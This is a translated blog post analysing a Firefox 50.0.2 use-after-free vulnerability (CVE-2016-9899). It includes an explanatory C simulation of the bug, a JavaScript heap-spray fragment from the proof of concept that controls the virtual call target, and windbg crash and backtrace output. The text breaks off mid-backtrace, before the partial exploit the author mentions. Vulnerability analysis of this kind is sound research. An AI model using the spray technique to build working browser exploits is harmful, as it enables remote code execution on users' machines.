Firefox 50.0.2 use-after-free vulnerability analysis (CVE-2016-9899) - Vulnerability warning - Black Bar Safety Net

ID MYHACK58:62201783195
Type myhack58
Reporter Anonymous
Modified 2017-01-27T00:00:00


Author: k0shl. Please credit the source when reprinting. Author's blog: http://whereisk0shl.top


Xiaonian (the Little New Year) has just passed and the Spring Festival is near, so let me wish you all an early Happy New Year!

It has been a while since I looked at a use-after-free vulnerability. The cause of this one is very classic: after the object is freed, a dangling pointer to it remains, because the holder of that pointer never took part in the object's reference counting. A later allocation then reoccupies the freed memory, the dangling pointer is used as if the object were still alive, the data now occupying the memory is dereferenced as the virtual function pointer, and the result is code execution.
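As an added illustration of the pattern just described (constructed here; it is neither Firefox code nor the author's PoC): a reference-counted object whose first field is a vtable-style pointer, a frame that keeps a raw pointer without holding a reference, and a tiny fixed-size slot pool standing in for the browser heap so that the freed slot is deterministically reused by a spray buffer carrying the PoC's 4F 48 43 45 bytes; the strong-reference variant shows the nsCOMPtr-style fix. The Content type, the slot pool and all function names are assumptions of this example.

```c
#include <stdint.h>
#include <string.h>

/* Constructed fixed-size slot pool standing in for the browser heap: a freed
 * slot is handed to the next same-size allocation, which is what a spray relies on. */
#define SLOT_SIZE 16
#define NSLOTS 4
static _Alignas(16) unsigned char slots[NSLOTS * SLOT_SIZE];
static int slot_used[NSLOTS];
static void *slot_alloc(void) {
    for (int i = 0; i < NSLOTS; i++)
        if (!slot_used[i]) { slot_used[i] = 1; return slots + i * SLOT_SIZE; }
    return NULL;
}
static void slot_free(void *p) { slot_used[((unsigned char *)p - slots) / SLOT_SIZE] = 0; }

/* Refcounted object whose first field is a vtable-style pointer, as in a C++ object. */
typedef void (*method_t)(void);
static void content_noop(void) {}
static const method_t content_vtbl[] = { content_noop };
typedef struct { const method_t *vtable; int refcnt; } Content;
static Content *content_new(void) {
    Content *c = slot_alloc(); c->vtable = content_vtbl; c->refcnt = 1; return c;
}
static void content_addref(Content *c) { c->refcnt++; }
static void content_release(Content *c) { if (--c->refcnt == 0) slot_free(c); }

/* Bug pattern: the frame keeps a raw pointer without taking a reference. Once the
 * owner releases, a spray buffer (first bytes 4F 48 43 45, as in the PoC) reclaims
 * the slot, so the dangling object's vtable field reads 0x4543484F, the edx value at
 * the crash. Returning the value rather than calling through it keeps this runnable. */
static uint32_t raw_pointer_frame(void) {
    Content *owner = content_new();
    Content *frame = owner;               /* no addref: weak raw pointer */
    content_release(owner);               /* freed; frame now dangles */
    unsigned char *spray = slot_alloc();  /* same size class, same slot */
    memset(spray, 0x91, SLOT_SIZE);
    spray[0] = 0x4F; spray[1] = 0x48; spray[2] = 0x43; spray[3] = 0x45;
    return (uint32_t)(uintptr_t)frame->vtable;
}

/* Fix: the frame owns a reference (what nsCOMPtr provides), so the object outlives the
 * owner's release and its vtable pointer is still content_vtbl when used. */
static int strong_reference_frame(void) {
    Content *owner = content_new(), *frame = owner;
    content_addref(frame);
    content_release(owner);
    int intact = frame->vtable == content_vtbl;
    content_release(frame);
    return intact;
}
```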

When analysing a use-after-free we usually enable page heap with gflags /I +hpa and then use !heap -p -a addr to observe the allocation and free history of the pointer; alternatively, we can load the symbol table and observe the types of the parameters passed to the function. In this debugging session, however, even with gflags enabled I could not locate the allocation and release of the target pointer object, and after loading symbols I still could not see the parameter types passed to the function. In that case we can analyse with a stack backtrace instead, which is also a useful tip.

This tip is somewhat more troublesome than the !heap method, because in the many logic-processing paths of a major browser the function that appears in the kb backtrace is called more than once, so we have to keep adjusting breakpoints on the symbol path that triggers the vulnerability. Once we have analysed one execution path we can infer the types of the parameters passed to the function, and we need to keep track of the important function calls; if a function is called multiple times, a conditional breakpoint lets us analyse the entire use-after-free process.

Vulnerability reproduction

At the end of the article I provide an exploit that I have only half finished modifying. What it lacks compared with a complete exploit is the shellcode and one rop gadget: after the heap spray, a rop gadget is needed to change esp to the address of the rop chain on the heap so that the rop chain executes smoothly (mona can do the search for it), and the shellcode follows the rop chain.

First, the PoC can be obtained directly from the vulnerability database, at the following address:

We can fetch symbols directly from the Firefox symbol server and load them in windbg with a symbol path of the form srv*

Then open the PoC and Firefox crashes.

(7f8.b0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=1637d800 ebx=00000000 ecx=0012dea8 edx=4543484f esi=0012dec4 edi=14e8dee0
eip=0292c44c esp=0012de98 ebp=0012deac iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
xul!nsCOMPtr<nsIContent>::nsCOMPtr<nsIContent>+0x1d:
0292c44c ff12 call dword ptr [edx] ds:0023:4543484f=????????

This crash location is interesting: it is a call [edx], which looks like a virtual function call, and the address 4543484f is a value we placed in the PoC.

var pl = []; // the array is declared earlier in the full PoC
for (var i = 0; i < 4096; i++) { // replace
    pl[i] = new Uint8Array(1000);
    pl[i][0] = 0x4F; pl[i][1] = 0x48; pl[i][2] = 0x43; pl[i][3] = 0x45; // eip
    for (var j = 4; j < (1000) - 4; j++) pl[i][j] = 0x91;
    // pl[i] = document.createElement('media');
    // document.body.appendChild(pl[i]);
}

In the PoC, a large number of arrays (4096 of them) are allocated, each 1000 bytes in size, and the first 4 bytes of each are the value that call [edx] dereferences, which means we may be able to exploit this vulnerability for RCE. Since the !heap method cannot show us how the target object is allocated and released, we next use kb to trace back the stack calls.

0:000> kb
ChildEBP RetAddr Args to Child
0012deac 0173df89 0feccc00 0012decc 0012dee8 xul!nsCOMPtr<nsIContent>::nsCOMPtr<nsIContent>+0x1d [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\nscomptr.h @ 504]
0012debc 012dfa21 00000000 00000000 0e9786c0 xul!nsPluginFrame::BeginSwapDocShells+0xf [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\generic\nspluginframe.cpp @ 1796]
0012dee8 0137f404 0173df7a 00000000 125fd1c0 xul!nsIDocument::EnumerateActivityObservers+0x33 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\dom\base\nsdocument.cpp @ 10246]
0012df04 0137f3a6 12781800 00000000 140c2058 xul!BeginSwapDocShellsForDocument+0x42 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\generic\nssubdocumentframe.cpp @ 1100]
0012df1c 0137f2ab 140c1d90 140c21a8 140c2058 xul!BeginSwapDocShellsForViews+0x1e [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\generic\nssubdocumentframe.cpp @ 1112]
0012df34 011b3ef5 140c2058 140c2058 140c1d40 xul!nsSubDocumentFrame::DestroyFrom+0x36 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\generic\nssubdocumentframe.cpp @ 999]
0012df78 016897ff 140c2058 00000002 140c1d40 xul!nsBlockFrame::DoRemoveFrame+0x108 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\generic\nsblockframe.cpp @ 5797]
0012df90 011dd9f4 00000001 140c2058 134dd080 xul!nsBlockFrame::RemoveFrame+0x27 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\generic\nsblockframe.cpp @ 5162]
0012dfb0 011dd811 00000001 140c2058 0c4969b0 xul!nsFrameManager::RemoveFrame+0x3c [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\base\nsframemanager.cpp @ 513]
0012e00c 011df01b 10ef4420 134dd080 113f5940 xul!nsCSSFrameConstructor::ContentRemoved+0x1b0 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\base\nscssframeconstructor.cpp @ 8414]
0012e058 011e0e78 11145800 113f5940 134dd000 xul!PresShell::ContentRemoved+0xc0 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\base\nspresshell.cpp @ 4432]
0012e094 011e17de 00000001 113f5900 10ef4454 xul!nsNodeUtils::ContentRemoved+0xd5 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\dom\base\nsnodeutils.cpp @ 226]
0012e0b8 011e1774 00000001 00000001 134dd080 xul!nsINode::doRemoveChildAt+0x5a [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\dom\base\nsinode.cpp @ 1906]
0012e0dc 016e2401 00000001 00000001 00000000 xul!mozilla::dom::FragmentOrElement::RemoveChildAt+0x35 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\dom\base\fragmentorelement.cpp @ 1162]
0012e0f4 016e23b9 0132dd44 0a34b000 0012e144 xul!nsINode::Remove+0x34 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\dom\base\nsinode.cpp @ 1828]
0012e0f8 0132dd44 0a34b000 0012e144 134dd080 xul!mozilla::dom::ElementBinding::remove+0x9 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dom\bindings\documenttypebinding.cpp @ 302]
0012e1c4 0132d81a 00000000 0012e358 0000003a xul!js::InternalCallOrConstruct+0x4d4 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\vm\interpreter.cpp @ 453]
0012e1e8 011fc510 0ece2868 0c710705 0012e2e8 xul!InternalCall+0x9a [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\vm\interpreter.cpp @ 498]
0012e3a8 012fbb08 0c71055f 00000001 0c4b8060 xul!js::jit::DoCallFallback+0x3f0 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\jit\baselineic.cpp @ 5979]
0012e4c0 0138817a 0a34b000 0c4b80c0 0012ee38 xul!EnterBaseline+0x288 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\jit\baselinejit.cpp @ 158]
0012e59c 013a496b 0c498c97 0a34b000 1657ed30 xul!js::jit::EnterBaselineAtBranch+0x2ab [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\jit\baselinejit.cpp @ 262]
0012ee38 0185bfdd 0012eef8 0012eef8 0012eef8 xul!Interpret+0x89bb [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\vm\interpreter.cpp @ 1877]
0012eec8 01223230 0a34b000 0012eee8 14a52060 xul!js::RunScript+0x21d [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\vm\interpreter.cpp @ 399]
0012ef28 013507bb 0012f004 0012ef58 00000000 xul!js::ExecuteKernel+0x64 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\vm\interpreter.cpp @ 682]
0012ef70 013504c6 0012f004 00000000 0012f0d8 xul!js::Execute+0x76 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\vm\interpreter.cpp @ 711]
0012f038 01659c6b 0012f060 0012f06c 0012f14c xul!Evaluate+0xaa [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\jsapi.cpp @ 4436]
0012f074 01186b50 0012f258 0012f14c 0012f188 xul!Evaluate+0x66 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\jsapi.cpp @ 4463]
0012f11c 011862c5 0012f240 0012f258 0012f198 xul!nsJSUtils::EvaluateString+0x242 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\dom\base
